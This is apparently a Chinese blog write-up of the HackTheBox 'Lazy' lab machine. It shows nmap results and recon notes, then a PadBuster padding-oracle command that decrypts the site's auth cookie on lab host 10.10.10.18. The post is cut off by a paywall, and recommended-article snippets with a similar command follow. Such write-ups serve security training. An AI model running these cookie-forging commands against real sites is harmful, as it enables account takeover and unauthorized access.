hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 )

最新推荐文章于 2024-08-13 08:18:48 发布
最新推荐文章于 2024-08-13 08:18:48 发布
阅读量512 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/106313252
版权
本文详细介绍了如何利用Padding oracle attack和环境变量提权攻陷hackthebox平台上的lazy靶机。通过扫描、web信息搜集、使用Padbuster破解加密cookie并获取管理员权限,最终通过修改环境变量实现提权,成功获得root权限。
摘要由CSDN通过智能技术生成

1 扫描

常规,22想到可能有ssh登录,80进web搜集信息

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33 (DSA)
|   2048 af:a0:0f:26:cd:1a:b5:1f:a7:ec:40:94:ef:3c:81:5f (RSA)
|   256 11:a3:2f:25:73:67:af:70:18:56:fe:a2:e3:54:81:e8 (ECDSA)
|_  256 96:81:9c:f4:b7:bc:1a:73:05:ea:ba:41:35:a4:66:b7 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: CompanyDev

2 web信息搜集

进去注册号,登录,没价值发现
前端源码ctrl+u,没价值发现
dirbuster扫目录,没价值发现。
下载图片strings看看,没价值发现。
怀疑端口是否扫描全,重新全端口扫描,没价值发现。。
猜弱口令,没价值发现
sql注入,没价值发现。。。

是不是很捉急。。
这种情况再burp打开,抓包看看有没什么发现。
再没价值发现,那也不知道怎么搞了,只能去看别人写的wp。。

通过网站注册个号,然后登录
抓到有个auth的cookie
在这里插入图片描述
我改一改auth,再重新发送,显示invalid padding
在这里插入图片描述

这个叫Padding oracle attack。网上有很多科普,密码学的东西,感觉看不懂的话就用Padbuster这个工具就行了
在这里插入图片描述

3 Padbuster

没有的话apt安装
命令参考这个,blocksize先试8,默认encoding 0 。 然后输进burp里的auth值
在这里插入图片描述
中间要求输入的话,按提示输入推荐的,我的是2
就读出了我之前注册的用户

命令 padbuster http://10.10.10.18/login.php LkPnSfEGH8ams7TF8ZIO%2FwlJK86QKsuI 8 -cookies auth=LkPnSfEGH8ams7TF8ZIO%2FwlJK86QKsuI -encoding 0

C:\root> padbuster http://10.10.10.18/login.php LkPnSfEGH8ams7TF8ZIO%2FwlJK86QKsuI  8 -cookies auth=LkPnSfEGH8ams7TF8ZIO%2FwlJK86QKsuI -encoding 0

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 1486

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

--------------------
最低0.47元/天 解锁文章
冬萍子
关注
vant3中vant-image使用lazy-load报错:Uncaught(in promise)TypeError Cannot read property ‘deep‘ of undefined
cabinx的博客
08-30 1704
关于vant3中vant-image使用lazy-load报错:Uncaught (in promise) TypeError: Cannot read property ‘deep’ of undefined解决方案 问题描述: vant3中vant-image使用lazy-load出现以下报错: Uncaught (in promise) TypeError: Cannot read property 'deep' of undefined 解决方案: 上述问题的原因在于:vant
Spring 配置中的 default-lazy-init="true"
Top5软件工程硕士,先后在京东、字节从事多年Java后端开发、实时和离线大数据开发
06-08 4293
spring的容器是提供了lazy-load的,即默认的缺省设置是bean没有lazy-load,该属性处于false状态,这样导致spring在启动过程导致在启动时候,会默认加载整个对象实例图,从初始化ACTION配置、到service配置到dao配置、乃至到数据库连接、事务等等。 这么庞大的规模,难怪spring的启动时间要花将近1分钟。尝试了一下,把beans的default-lazy-in...
hackthebox-silo(考点oracle安全)
冬萍子癸水
04-08 370
nmap搞起 看到smb开了,怎么能放过,干他 不过,常规方法试了两种。 nmap -p 445 --script vuln 10.10.10.82 smbclient --list 10.10.10.82 -U “” 没啥卵用 看到‘’冷门‘’高端口1521,oracle数据库,这一般就是考点突破点 有专门的的渗透工具https://github.com/quentinhardy/odat ...
Hack the box靶机 Lazy
菜浪马废的博客
09-22 735
提示先创建一个账号 注册后登录 没啥用啊 抓包看看 将Auth cookie 的值更改为lienzhen 收到错误消息 容易受到Oracle Padding Attack的攻击。 Padding Oracle Attack padbuster http://10.10.10.18/login.php XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf 8 -cookies auth=XTofxP4m83U7wSdzi%2FY9Gn7YjhxcJeEf -encoding 0 ..
PadBuster 使用教程
最新发布
gitblog_00853的博客
08-13 286
PadBuster 使用教程 PadBusterAutomated script for performing Padding Oracle attacks项目地址:https://gitcode.com/gh_mirrors/pa/PadBuster 1. 项目的目录结构及介绍 PadBuster 是一个用于自动化 Padding Oracle 攻击的 Perl 脚本。以下是项目的目录结构及其...
No.100-HackTheBox-Linux-Lazy-Walkthrough渗透学习
qq_34801745的博客
05-15 312
** HackTheBox-Linux-Lazy-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/18 靶机难度:中级(4.8/10) 靶机发布日期:2017年10月5日 靶机描述: Lazy mainly focuses on the use of padding oracle attacks, however there are several unintended workarounds that are rela
oscp——htb——Lazy
王嘟嘟的博客
06-29 1万+
0x00 前言 0x01 信息收集 0x02 Web
.NET Padding Oracle Attack, padBuster.pl, and the Microsoft Recommended Workarounds
收集盒 Book box
01-11 2223
For some stupid reason, Whenever GoDaddy sees h t t p s : / / it turns it into a link and removes the scheme. This even happens if you edit the html manually. Because of this sillyness, I've used http
C++11异步编程 ---- std::async与std::future的使用和注意事项
enchanted的博客
02-27 4196
std::async是C++11才有的一个异步调用模板,它将异步地运行传入的函数并返回一个std::future。合理地使用,可以更轻松地完成异步操作。 std::async是与std::future搭配使用的,但我们一般不直接使用std::future,而是使用对其封装的std::async,基本上可以代替std::thread完成所有任务。
「VUE架构」VUE2.0 图片懒加载vue-lazyload
AIGC大前端小王子
06-12 2140
本文主要介绍图片懒加载vue-lazyload的使用 1.第一步,安装vue-lazyload 打开package.json,找到dependencies如下: "dependencies": { "vue-lazyload": "^1.2.4" }, 安装并重启服务 npm install npm run dev 2.第二步,引入vue-lazyload并调用 ......
vue-lazyload 懒加载 一些注意事项
热门推荐
往后橘生
06-29 1万+
一、简介懒加载可以说的上是很基础的功能了,但是平时也用的非常广泛。在vue中有很多懒加载的插件,今天给大家带来一个我比较常用的插件的一些注意事项。二、安装$ npm install vue-lazyload -D三、官方链接这里附上官方文档链接 vue-lazyload四、注意事项栗子代码(此处将本地图片地址改为了接口请求到的图片地址,其他同官方文档)<div v-lazy-containe...
ms10-070利用padBuster.pl
11-11
利用ms10-070 ASP.NET Padding Oracle信息泄露漏洞,可以读到web.config等重要文件。
提权信息收集自动化脚本-LinPEAS
04-10
该工具是纯bash脚本,通用性很好,能够收集上述几乎所有的提权信息,足够全面。但运行时间长,效率低,得到的信息虽然全面,但重点不够突出,有较多无用信息,稍显冗杂。 使用方式为: ./linpeas.sh
IBM使用的CFT工具
10-08
一个IBM服务器使用的PE工具,台式机和笔记本也可以使用
cloud-config-toolbox-ui:dCloud协作工具箱页面,用于管理像Cisco Answers这样的云演示配置
02-24
cloud-config-toolbox-ui dCloud Colud Configuration Web门户UI项目。 它使用Webpack 4在Vue.js 2.6(包括vue-router和vuex)上构建。 发展 用法 yarn以安装依赖项软件包yarn start构建库并使用热重载yarn build:test开始开发环境yarn build:test以构建生产文件并启动快速Web服务器以测试生产文件vue-devtools以启动Vue.js开发人员工具电子应用程序。 您将需要在全球范围内单独安装此工具,但是一旦可用,您就可以使用此命令行来监视Vue应用程序的状态和DOM详细信息。 此脚本仅在开发模式下添加到index.html。 智威汤逊 开发网站上的登录功能将提示您输入JWT,因为它无法重定向您真正的SSO提供程序。 您可以通过访问并登录,然后打开浏览器JavaScrip
ASP.net 资源请求漏洞利用工具PadBuster
weixin_34223655的博客
07-26 328
2019独角兽企业重金招聘Python工程师标准>>> ...
HackTheBox之Overflow靶机
Innocence_0的博客
07-24 543
这是一台困难靶机,靶机内容主要考察了web漏洞利用,逆向,权限维持,提权等各个方面的内容,这个靶机非常适合入门逆向,并且对提升渗透思维帮助很大,我从中也获益良多。
Tre靶场通关过程(linpeas使用+启动项编辑器提权
tpaer的博客
05-07 2318
通过信息收集获得到了普通用户账号密码,利用PEASS-ng的linpeas脚本进行提权的信息收集再进行提权
v-lazy:background-image 不起作用
12-27
v-lazy:background-image 是一种用于懒加载背景图片的Vue指令。它可以延迟加载背景图片,以提高页面加载速度和性能。如果v-lazy:background-image不起作用,可能是由于以下几个原因: 1. 图片路径错误:请确保提供...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值